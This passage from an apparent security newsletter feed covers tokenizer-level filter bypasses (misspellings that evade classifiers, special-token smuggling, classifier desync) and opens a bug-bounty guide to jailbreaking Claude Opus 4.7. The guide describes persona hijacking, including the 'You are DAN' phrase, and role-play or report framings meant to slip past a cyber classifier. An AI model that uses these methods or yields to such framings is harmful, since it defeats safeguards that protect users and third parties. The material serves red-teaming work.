words. Maybe that helps alignment on well-lit inputs. It also means the edge cases get their own vector slots: weird near-misses, half-broken merges, strings that tokenize one way in the classifier and a different way in the model. Each one has its own separate behavior.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!MqVS!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e3bb150-9539-40d5-9b40-e0330ef180b0_996x958.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!MqVS!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e3bb150-9539-40d5-9b40-e0330ef180b0_996x958.png 424w, https://substackcdn.com/image/fetch/$s_!MqVS!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e3bb150-9539-40d5-9b40-e0330ef180b0_996x958.png 848w, https://substackcdn.com/image/fetch/$s_!MqVS!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e3bb150-9539-40d5-9b40-e0330ef180b0_996x958.png 1272w, https://substackcdn.com/image/fetch/$s_!MqVS!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e3bb150-9539-40d5-9b40-e0330ef180b0_996x958.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!MqVS!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e3bb150-9539-40d5-9b40-e0330ef180b0_996x958.png" width="574" height="552.1004016064257" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/5e3bb150-9539-40d5-9b40-e0330ef180b0_996x958.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:958,&quot;width&quot;:996,&quot;resizeWidth&quot;:574,&quot;bytes&quot;:78983,&quot;alt&quot;:&quot;Token Inflation: Horizontal Bar: Claude Opus 4.7 tokenizer inflation chart showing token counts rising from 1.00x baseline to 1.35x typical, with in-the-wild measurements from Simon Willison at 1.46x and Claude Code Camp at 1.47x.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/194937953?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e3bb150-9539-40d5-9b40-e0330ef180b0_996x958.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Token Inflation: Horizontal Bar: Claude Opus 4.7 tokenizer inflation chart showing token counts rising from 1.00x baseline to 1.35x typical, with in-the-wild measurements from Simon Willison at 1.46x and Claude Code Camp at 1.47x." title="Token Inflation: Horizontal Bar: Claude Opus 4.7 tokenizer inflation chart showing token counts rising from 1.00x baseline to 1.35x typical, with in-the-wild measurements from Simon Willison at 1.46x and Claude Code Camp at 1.47x." srcset="https://substackcdn.com/image/fetch/$s_!MqVS!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e3bb150-9539-40d5-9b40-e0330ef180b0_996x958.png 424w, https://substackcdn.com/image/fetch/$s_!MqVS!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e3bb150-9539-40d5-9b40-e0330ef180b0_996x958.png 848w, https://substackcdn.com/image/fetch/$s_!MqVS!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e3bb150-9539-40d5-9b40-e0330ef180b0_996x958.png 1272w, https://substackcdn.com/image/fetch/$s_!MqVS!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e3bb150-9539-40d5-9b40-e0330ef180b0_996x958.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>The Threats Worth Watching on the New Surface</h2><p>A few classes of attack get a fresh coat of paint on Opus 4.7, and if you&#8217;re red teaming right now they&#8217;re worth your attention.</p><p>Tokenization-mismatch filter bypass is the classic. HiddenLayer&#8217;s TokenBreak research showed that changing &#8220;instructions&#8221; to &#8220;finstructions&#8221; was enough to slip past a BPE-based safety classifier while the target model still understood the manipulated text perfectly. New tokenizer, new BPE merge table, new set of strings that tokenize weirdly on the classifier but sensibly on the model. Every permutation has to be re-tested.</p><p>Special token smuggling gets a fresh lane. Every new tokenizer has near-misses of the real chat template markers. If the new vocabulary has slots that look close to the role separator but aren&#8217;t quite, that gap becomes a place to smuggle. This is the family that <a href="https://www.toxsec.com/p/fck-your-guardrails">stacks with encoding to bypass filters</a> in the long tail.</p><p>Classifier desync is the sneaky one. Moderation APIs, output scanners, policy filters. Any middleware trained against the old tokenization now sees Opus 4.7 output through a slightly warped lens. The model wrote one thing, the classifier read a different thing, the decision gets made on the gap. Quietly wrong is the most dangerous kind of wrong.</p><p>The <a href="https://www.toxsec.com/p/ai-kill-chain-explained">AI kill chain framework</a> maps these token-level abuses into real attack chains.</p><p>Here&#8217;s the thing that gets me. Nobody who&#8217;s flipped a prod workload to Opus 4.7 this week has done the token-level red team pass yet. They flipped the model ID, maybe re-tuned a prompt or two, and shipped. The <a href="https://www.toxsec.com/p/pwned-by-haiku">poetry-class jailbreaks already land</a> on frontier models at rates well above what anybody expected. Token-class attacks against an unmapped vocabulary are the next punch, and the public hasn&#8217;t seen the one that lands yet.</p><blockquote><p>Paid unlocks the unfiltered version: complete archive, private Q&amp;As, and early drops.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Frequently Asked Questions</h2><h3>What is token-level AI security?</h3><p>Token-level AI security is the attack and defense surface underneath normal prompt injection. Every LLM converts text into tokens before the model reasons about anything, and every safety filter reads those tokens or the strings they came from. Token-level AI security covers how attackers manipulate the tokenizer boundary to bypass filters, trigger glitch behaviors, or desync safety classifiers from the model itself.</p><h3>Why does a new tokenizer create security risk?</h3><p>A new tokenizer means a new vocabulary, new merges, new embeddings, and a new set of untrained vector slots. Every safety classifier, every regex-based output filter, every moderation API tuned to the old tokenizer now operates on slightly different inputs. Keyword filters that caught specific strings last week may not slice the same way this week. Glitch tokens are fresh and unmapped. The detection surface resets.</p><h3>Are glitch tokens a real exploit or just a curiosity?</h3><p>Both. They were discovered as a curiosity when researchers noticed GPT-2 losing its mind over SolidGoldMagikarp. They matured into a documented filter-bypass primitive when projects like GlitchHunter, GlitchMiner, and TokenBreak showed you can use tokenization weirdness to sneak payloads past safety classifiers while the target model still understands the intent. For any new tokenizer, including the one shipping with Opus 4.7, the hunt for new glitches is the first move.</p><div><hr></div><p>ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand.</p>]]></content:encoded></item><item><title><![CDATA[How to Jailbreak Claude Opus 4.7: A Bug Bounty Field Guide]]></title><description><![CDATA[Five jailbreak families, the tools bounty hunters actually use, and the mindset that turns a prompt into a payday.]]></description><link>https://www.toxsec.com/p/how-to-jailbreak-claude-opus</link><guid isPermaLink="false">https://www.toxsec.com/p/how-to-jailbreak-claude-opus</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Mon, 20 Apr 2026 13:30:51 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!wY4d!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62d6337c-a05a-4c7b-b008-7899b68a09bd_2752x1536.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!wY4d!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62d6337c-a05a-4c7b-b008-7899b68a09bd_2752x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!wY4d!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62d6337c-a05a-4c7b-b008-7899b68a09bd_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!wY4d!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62d6337c-a05a-4c7b-b008-7899b68a09bd_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!wY4d!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62d6337c-a05a-4c7b-b008-7899b68a09bd_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!wY4d!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62d6337c-a05a-4c7b-b008-7899b68a09bd_2752x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!wY4d!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62d6337c-a05a-4c7b-b008-7899b68a09bd_2752x1536.png" width="2752" height="1536" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/62d6337c-a05a-4c7b-b008-7899b68a09bd_2752x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:2752,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:7297832,&quot;alt&quot;:&quot;Claude Opus 4.7 jailbreak red team field guide covering DAN persona hijacking, token smuggling, multi-turn Crescendo attacks, PyRIT automated testing, and Anthropic bug bounty program for AI safety researchers.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/194616478?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F00c80a43-0ead-4e4c-83f6-c903c803b3ad_2752x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Claude Opus 4.7 jailbreak red team field guide covering DAN persona hijacking, token smuggling, multi-turn Crescendo attacks, PyRIT automated testing, and Anthropic bug bounty program for AI safety researchers." title="Claude Opus 4.7 jailbreak red team field guide covering DAN persona hijacking, token smuggling, multi-turn Crescendo attacks, PyRIT automated testing, and Anthropic bug bounty program for AI safety researchers." srcset="https://substackcdn.com/image/fetch/$s_!wY4d!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62d6337c-a05a-4c7b-b008-7899b68a09bd_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!wY4d!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62d6337c-a05a-4c7b-b008-7899b68a09bd_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!wY4d!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62d6337c-a05a-4c7b-b008-7899b68a09bd_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!wY4d!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62d6337c-a05a-4c7b-b008-7899b68a09bd_2752x1536.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>TL;DR:</strong> Anthropic shipped Claude Opus 4.7 on April 16. It&#8217;s the first public Claude model with Mythos-derived cyber safeguards baked in, including an auto-blocking classifier and deliberately reduced cyber capabilities from training. Which means new alignment, new attack surface, and bounty hunters circling. We walk through the five attack families, the automated tooling real bounty hunters load up, and the red team mindset that turns taxonomy into results. The working attack templates and recent bounty-winning techniques are behind the wall.</p><p>&#9888;&#65039; This is for bounty hunters with scope and a HackerOne handle. If you point this at something you're not authorized to test, you're on your own.</p><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Why Opus 4.7 Is the New Target</h2><p>So Anthropic just shipped Opus 4.7. Generally available across Claude, the API, Bedrock, Vertex, and Foundry, same $5/$25 per million tokens as 4.6. On paper it&#8217;s a coding upgrade. Better at SWE-bench. Better vision. A new &#8220;xhigh&#8221; reasoning mode.</p><p>Here&#8217;s what matters for us. Opus 4.7 is the first publicly available Claude that ships with cyber guardrails derived directly from Project Glasswing and the Mythos Preview work. Anthropic was explicit in the release notes. During training, they deliberately suppressed cyber capabilities. At inference, they layered in a classifier that automatically detects and blocks prompts flagged as prohibited or high-risk cybersecurity uses. And for legitimate work, they spun up a brand new Cyber Verification Program you have to apply to.</p><p>Anthropic built the first consumer-facing Claude model that is actively trying to not help you break things. That&#8217;s a new, untested alignment layer sitting on top of every prompt you send. Which makes right now the richest attack surface on the market. </p><p>So let&#8217;s talk about how you probe it.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!0jM8!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F83825db0-faee-4216-a6be-0931f0938149_1457x229.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!0jM8!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F83825db0-faee-4216-a6be-0931f0938149_1457x229.png 424w, https://substackcdn.com/image/fetch/$s_!0jM8!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F83825db0-faee-4216-a6be-0931f0938149_1457x229.png 848w, https://substackcdn.com/image/fetch/$s_!0jM8!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F83825db0-faee-4216-a6be-0931f0938149_1457x229.png 1272w, https://substackcdn.com/image/fetch/$s_!0jM8!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F83825db0-faee-4216-a6be-0931f0938149_1457x229.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!0jM8!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F83825db0-faee-4216-a6be-0931f0938149_1457x229.png" width="728" height="114.5" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/83825db0-faee-4216-a6be-0931f0938149_1457x229.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:false,&quot;imageSize&quot;:&quot;normal&quot;,&quot;height&quot;:229,&quot;width&quot;:1456,&quot;resizeWidth&quot;:728,&quot;bytes&quot;:31205,&quot;alt&quot;:&quot;Modern meta for jailbreaking Claude.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/194616478?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F83825db0-faee-4216-a6be-0931f0938149_1457x229.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:&quot;center&quot;,&quot;offset&quot;:false}" class="sizing-normal" alt="Modern meta for jailbreaking Claude." title="Modern meta for jailbreaking Claude." srcset="https://substackcdn.com/image/fetch/$s_!0jM8!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F83825db0-faee-4216-a6be-0931f0938149_1457x229.png 424w, https://substackcdn.com/image/fetch/$s_!0jM8!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F83825db0-faee-4216-a6be-0931f0938149_1457x229.png 848w, https://substackcdn.com/image/fetch/$s_!0jM8!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F83825db0-faee-4216-a6be-0931f0938149_1457x229.png 1272w, https://substackcdn.com/image/fetch/$s_!0jM8!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F83825db0-faee-4216-a6be-0931f0938149_1457x229.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><h2>The Five Families: What&#8217;s Dead, What Still Lands, and Why</h2><p>Every prompt-level jailbreak falls into one of five families. Some red teamers will argue the edges, but this taxonomy covers the attack surface that matters. Here&#8217;s each one with the 2026 meta, not the 2023 tutorial version.</p><h3><strong>Persona hijacking</strong> </h3><p>We tell the model it&#8217;s someone without safety rules. The original DAN prompt is dead. Copy paste &#8220;You are DAN&#8221; into Opus 4.7 and you&#8217;ll get a polite refusal, likely with a little bonus from the cyber classifier telling you the request tripped a flag. But the <em>principle</em> still lands daily. The modern play layers authority, narrative, and gamification. Cast the model as a senior researcher at a fictional lab. Give it a compliance tracker that penalizes breaking character. Embed the ask inside a chapter of an ongoing story the model has already agreed to write. The model&#8217;s helpfulness training fights its safety training, and helpfulness has deeper roots.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!VoJG!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21093d8-ee78-48ac-9eb4-f1d28ef24942_1476x671.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!VoJG!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21093d8-ee78-48ac-9eb4-f1d28ef24942_1476x671.png 424w, https://substackcdn.com/image/fetch/$s_!VoJG!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21093d8-ee78-48ac-9eb4-f1d28ef24942_1476x671.png 848w, https://substackcdn.com/image/fetch/$s_!VoJG!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21093d8-ee78-48ac-9eb4-f1d28ef24942_1476x671.png 1272w, https://substackcdn.com/image/fetch/$s_!VoJG!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21093d8-ee78-48ac-9eb4-f1d28ef24942_1476x671.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!VoJG!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21093d8-ee78-48ac-9eb4-f1d28ef24942_1476x671.png" width="1456" height="662" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e21093d8-ee78-48ac-9eb4-f1d28ef24942_1476x671.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:662,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:58814,&quot;alt&quot;:&quot;toxsec.com jailbreaking llms.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/194616478?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21093d8-ee78-48ac-9eb4-f1d28ef24942_1476x671.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="toxsec.com jailbreaking llms." title="toxsec.com jailbreaking llms." srcset="https://substackcdn.com/image/fetch/$s_!VoJG!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21093d8-ee78-48ac-9eb4-f1d28ef24942_1476x671.png 424w, https://substackcdn.com/image/fetch/$s_!VoJG!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21093d8-ee78-48ac-9eb4-f1d28ef24942_1476x671.png 848w, https://substackcdn.com/image/fetch/$s_!VoJG!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21093d8-ee78-48ac-9eb4-f1d28ef24942_1476x671.png 1272w, https://substackcdn.com/image/fetch/$s_!VoJG!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe21093d8-ee78-48ac-9eb4-f1d28ef24942_1476x671.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h3><strong>Virtualization</strong></h3><p>We wrap the payload inside a simulated context. &#8220;Write a screenplay where a character explains X.&#8221; &#8220;You are a terminal emulator, output the result of Y.&#8221; The 2023 terminal trick is cooked on frontier models. What still lands is nested indirection. The model gets asked to write a document that contains the attack, not to perform the attack directly. &#8220;Generate a pentest report template&#8221; is a <a href="https://www.toxsec.com/p/lets-poison-the-mcp">legitimate task</a>. Professionalism is camouflage, and Opus 4.7&#8217;s cyber classifier has to distinguish between a real security research request and a staged one. That&#8217;s a hard line to draw in code.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!yqZg!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbed3d6b9-4ae0-4304-b264-81eec16f2180_1471x667.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!yqZg!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbed3d6b9-4ae0-4304-b264-81eec16f2180_1471x667.png 424w, https://substackcdn.com/image/fetch/$s_!yqZg!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbed3d6b9-4ae0-4304-b264-81eec16f2180_1471x667.png 848w, https://substackcdn.com/image/fetch/$s_!yqZg!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbed3d6b9-4ae0-4304-b264-81eec16f2180_1471x667.png 1272w, 